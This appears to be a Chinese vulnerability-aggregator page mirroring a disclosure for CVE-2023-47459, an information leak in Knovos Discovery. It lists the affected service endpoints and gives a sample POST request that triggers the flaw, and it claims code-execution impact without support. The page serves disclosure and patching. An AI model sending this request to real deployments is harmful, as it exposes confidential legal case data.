关联漏洞
标题:
Knovos Discovery 安全漏洞
(CVE-2023-47459)
描述:Knovos Discovery是Knovos公司的一个综合性法律发现平台。 Knovos Discovery v.22.67.0版本存在安全漏洞,该漏洞源于允许远程攻击者通过/DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName组件获取敏感信息。
介绍
# CVE-2023-47459
## Description
A vulnerability was discovered in Knovos Discovery v.22.67.0 that allows a remote attacker to access confidential information using the components: <br> /DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName, /DiscoveryReview/Service/WorkProduct.svc/BindRelatedDocumentsInformation and /DiscoveryProcess/Service/Admin.svc/getReviewIdForReport.
## Vulnerability Type
Stack trace / Information Disclosure
## Vendor of Product
Knovos Discovery
## Affected Product Code Base
Version 22.67.0 - Version 22.67.0
## Affected Component
/DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName
/DiscoveryReview/Service/WorkProduct.svc/BindRelatedDocumentsInformation
/DiscoveryProcess/Service/Admin.svc/getReviewIdForReport
## Attack Type
Remote
## Impact Code execution
true
## Impact Information Disclosure
true
## Discoverer
- Aleksey Vistorobskiy
## Attack Vectors
authorized user
```
POST /DiscoveryReview/Service/WorkProduct.svc/BindRelatedDocumentsInformation HTTP/1.1
Host: vuln_host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
Connection: close
{
"Id": id
}
```
## Reference
- https://www.knovos.com/
- https://github.com/aleksey-vi/CVE-2023-47459
文件快照
[4.0K] /data/pocs/3406b8bdc88b8da02c83012b652aea97053bd0ef
└── [1.3K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。